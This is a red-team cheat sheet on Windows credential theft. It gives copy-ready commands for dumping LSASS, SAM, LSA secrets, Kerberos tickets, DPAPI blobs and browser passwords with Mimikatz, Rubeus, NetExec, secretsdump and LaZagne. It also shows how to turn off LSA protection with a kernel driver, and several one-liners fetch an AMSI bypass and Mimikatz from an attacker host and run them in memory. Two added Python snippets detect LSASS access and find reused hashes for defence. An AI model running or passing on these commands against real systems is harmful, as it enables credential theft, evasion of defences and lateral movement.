Credential Theft
LSASS Dump
- Mimikatz Basics
mimikatz.exe
privilege::debug
To load mimikatz directly:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1')
One-liners:
invoke-mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords"'
invoke-mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam"'
- NTLM Hashes (this command requires elevated privileges)
This module is well known for being able to "dump plaintext passwords from memory"; however, Microsoft has implemented many mitigations in Windows 10 and later, such as disabling WDigest by default.
This module is still capable of retrieving NTLM hashes, which are useful for Pass the Hash or for cracking offline to recover the plaintext.
sekurlsa::logonpasswords
- Remote LSASS Dump
nxc smb 10.15.67.1 -u administrador -H 'e067b5abd85fa0e8f1d9c6e9611ae120' --local-auth -M lsassy
nxc smb 10.15.67.1 -u administrador -H 'e067b5abd85fa0e8f1d9c6e9611ae120' --local-auth -M nanodump
pypykatz lsa minidump X.log
- Offline LSASS Dump
First we run the custom minidump tool (https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump). We can use either the compiled executable or the ps1 script.
With the dump file created, we can run Mimikatz to parse it:
c:\Tools\Mimikatz\mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
To transfer the dump to our attacking Windows machine and read it directly with the PowerShell version of Mimikatz, we host the dumped LSASS file and the Mimikatz PowerShell script on the Kali machine and then:
wget -Uri http://192.168.119.120/lsass.dmp -OutFile C:\tools\lsass.dmp
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX
Invoke-Mimikatz -Command "`"sekurlsa::minidump c:\tools\lsass.dmp`" `"sekurlsa::logonpasswords`""
- Disable LSASS Protection
First, check the RunAsPPL registry key to determine if LSA Protection is enabled:
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
!+
--> loads the mimidrv.sys driver
!processprotect /process:lsass.exe /remove
--> disables LSA Protection. This requires uploading the mimidrv.sys driver to the victim machine, which may trigger antivirus.
We can also download an updated version of the Mimikatz mimidrv.sys and load it manually:
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
Then we can import the powershell version of mimikatz:
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/amsi.txt') | IEX
(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
Once the protection is gone, we can dump LSASS locally.
Kerberos Tickets Extraction
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage command lists all the Kerberos tickets in your current logon session and, if elevated, from all logon sessions on the machine:
Rubeus.exe triage
Rubeus' dump command will extract these tickets from memory, but because it uses Windows APIs it does not need to open suspicious handles to LSASS. Example:
Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
The /nowrap option formats the base64 encoding onto a single line, which makes copying and pasting much easier.
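As an added example (not from the original page), the following Python applies the auditing point above to constructed Sysmon Event ID 10 (ProcessAccess) records: it flags any non-allow-listed process that opens lsass.exe with an access mask that permits reading its memory, which is what the minidump techniques in the LSASS Dump section need. The log lines and the allow-list are constructed assumptions.

```python
# Windows process access rights relevant to reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Processes that routinely open lsass.exe on a stock host. This allow-list is an
# assumption for the example; tune it against a baseline of your own fleet.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed Sysmon Event ID 10 records flattened to key=value pairs (not real telemetry).
SAMPLE_EVENTS = [
    r"EventID=10|SourceImage=C:\Windows\system32\csrss.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1400",
    r"EventID=10|SourceImage=C:\Windows\system32\svchost.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Tools\MiniDump.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Tools\tasklist.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1000",
    r"EventID=10|SourceImage=C:\Tools\MiniDump.exe|TargetImage=C:\Windows\system32\notepad.exe|GrantedAccess=0x1FFFFF",
]

def parse_event(line):
    """Split one flattened record into a dict; GrantedAccess becomes an int."""
    fields = dict(pair.split("=", 1) for pair in line.split("|"))
    fields["GrantedAccess"] = int(fields.get("GrantedAccess", "0"), 16)
    return fields

def reads_memory(mask):
    """True when the handle could be used to read LSASS memory (a minidump needs VM_READ)."""
    return mask == PROCESS_ALL_ACCESS or bool(mask & PROCESS_VM_READ)

def flag_lsass_access(lines):
    """Return (source image, access mask) pairs that look like credential-dump handle opens."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":
            continue
        if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            continue
        src = ev.get("SourceImage", "").lower()
        if src in BENIGN_SOURCES or not reads_memory(ev["GrantedAccess"]):
            continue
        hits.append((ev["SourceImage"], ev["GrantedAccess"]))
    return hits

if __name__ == "__main__":
    for src, mask in flag_lsass_access(SAMPLE_EVENTS):
        print(f"suspicious LSASS handle: {src} GrantedAccess=0x{mask:X}")
```

On the sample data only the minidump tool and the unlisted powershell.exe are reported; the 0x1000 (QUERY_LIMITED_INFORMATION) open from tasklist.exe is ignored because it cannot read process memory.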
Kerberos Encryption Keys Dump
! This command requires high privileges
sekurlsa::ekeys
LSA Secrets Dump
LSA Secrets are stored in the SECURITY registry hive and contain sensitive and encrypted information used by the Local Security Authority (LSA). The LSA is a protected subsystem that authenticates and logs users onto the local system.
With mimikatz:
token::elevate
lsadump::secrets
Manually:
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
Then to obtain the hashes:
secretsdump.py -security '/path/to/security.save' LOCAL
With NetExec (can also be done with PtH and PtT):
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth --lsa
To remotely dump (This will dump LSA secrets and SAM):
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
Security Account Manager Dump (this command requires elevated privileges)
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only.
Usually %SYSTEMROOT% = C:\Windows. The SAM and SYSTEM hive files (and their backup copies) are located at:
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
With mimikatz:
mimikatz lsadump::sam
With msf:
meterpreter > run hashdump
Manually:
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Then to obtain the hashes:
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
With NetExec (can also be done with PtH and PtT):
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth --sam
To remotely dump (This will dump LSA secrets and SAM):
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
To generate a hash file for John or hashcat:
pwdump SYSTEM SAM >/root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
python3 creddump7/pwdump.py SYSTEM SAM
The resulting hashes can then be cracked with hashcat mode 1000 (NTLM).
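As an added example (not part of the original cheat sheet), the following Python reads pwdump-format output from several hosts and groups local accounts by NT hash, surfacing the shared-local-administrator situation described above so it can be remediated (for instance with LAPS) before it is abused. Hostnames and NT hashes are constructed; only the empty-LM and empty-password NT constants are the real well-known values.

```python
import re
from collections import defaultdict

# Well-known constants: LM field when LM hashes are disabled, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump line: user:rid:lm:nt:::
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

# Constructed secretsdump/pwdump-style output per host (made-up NT hashes, not real data).
SAMPLE_DUMPS = {
    "WS01": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    ],
    "WS02": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
        "helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
    "SRV01": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:aaaaaaaabbbbbbbbccccccccdddddddd:::",
        "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    ],
}

def parse_pwdump(lines):
    """Yield (user, rid, lm, nt) for each well-formed pwdump line; anything else is skipped."""
    for line in lines:
        m = PWDUMP_RE.match(line.strip())
        if m:
            yield m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()

def find_reuse(dumps):
    """Map each non-empty NT hash seen on more than one host to the (host, user) pairs sharing it."""
    by_hash = defaultdict(set)
    for host, lines in dumps.items():
        for user, _rid, _lm, nt in parse_pwdump(lines):
            by_hash[nt].add((host, user))
    return {nt: owners for nt, owners in by_hash.items()
            if nt != EMPTY_NT and len({h for h, _ in owners}) > 1}

def find_empty_passwords(dumps):
    """Return (host, user) pairs whose NT hash is the empty-password hash."""
    return [(host, user) for host, lines in dumps.items()
            for user, _rid, _lm, nt in parse_pwdump(lines) if nt == EMPTY_NT]
```

Run against the sample, find_reuse reports the Administrator hash shared by WS01 and WS02 and the svc_backup hash shared by WS01 and SRV01, while empty-password accounts are listed separately so they are not mistaken for password reuse.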
Domain Cached Credentials Dump
Domain Cached Credentials (DCC) were designed for instances where domain credentials are required to log on to a machine even while it is disconnected from the domain (think of a roaming laptop, for example). The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.
Unfortunately, the hash format is not NTLM, so it can't be used with Pass the Hash. The only viable use for these is to crack them offline.
! This command requires high privileges
The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.
DPAPI (Credential Manager) Dump
First we need to enumerate the user's vaults (see Exploitation/Active Directory/Host and Domain Recon/Other Tools/Seatbelt).
Next we need to decrypt the master key; there are two ways:
The first is only possible if you have local admin access on the machine and if the key is cached in LSASS.
mimikatz sekurlsa::dpapi
The second way (which does not require elevation or interaction with LSASS) is to request it from the domain controller via the Microsoft BackupKey Remote Protocol (MS-BKRP). This will only work if executed in the context of the user who owns the key.
mimikatz dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\{SID: S-X-X-XX-}\{masterkeyGUID} /rpc
Then, the blob can be decrypted:
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
DPAPI (Scheduled Task Credentials) Dump
Scheduled Tasks can save credentials so that they can run under the context of a user without them having to be logged on. If we have local admin privileges on a machine, we can decrypt them in much the same way. The blobs are saved under C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials.
ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\{BLOB}
mimikatz sekurlsa::dpapi
mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}
Then we can impersonate the user (make token).
To automate the process: https://github.com/login-securite/DonPAPI
Browser Credentials Dump
- SharpWeb
https://github.com/djhohnstein/SharpWeb
SharpWeb.exe
- Netexec
nxc smb {IP} -M firefox
- LaZagne
https://github.com/AlessandroZ/LaZagne
lazagne.exe all